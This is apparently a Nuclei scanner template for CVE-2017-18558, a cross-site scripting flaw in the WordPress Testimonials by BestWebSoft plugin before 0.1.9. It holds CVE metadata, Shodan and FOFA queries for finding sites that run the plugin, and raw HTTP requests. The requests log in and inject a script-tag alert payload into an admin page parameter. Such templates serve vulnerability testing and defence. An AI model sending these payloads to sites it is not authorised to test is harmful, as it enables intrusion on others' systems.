Description
The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues.
The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues.
id: CVE-2017-18558
info:
name: Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues.
impact: |
Authenticated attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
remediation: |
Update to version 0.1.9 or later.
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18558
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18558
- https://wordpress.org/plugins/bws-testimonials/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18558
cwe-id: CWE-79
epss-score: 0.01384
epss-percentile: 0.70805
cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: bestwebsoft
product: testimonials
framework: wordpress
shodan-query: http.html:/wp-content/plugins/bws-testimonials/
fofa-query: body=/wp-content/plugins/bws-testimonials/
publicwww-query: "/wp-content/plugins/bws-testimonials/"
tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "Testimonials by BestWebSoft")'
condition: and
# digest: 4a0a004730450220390d561d04cd38b28541acff889e7ed3fae05534b80dad6084f2e9cde9f7405e02210097a957f7469858ae5485dab6d8fe410a8537c46120103c2959f78b3feae72922:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.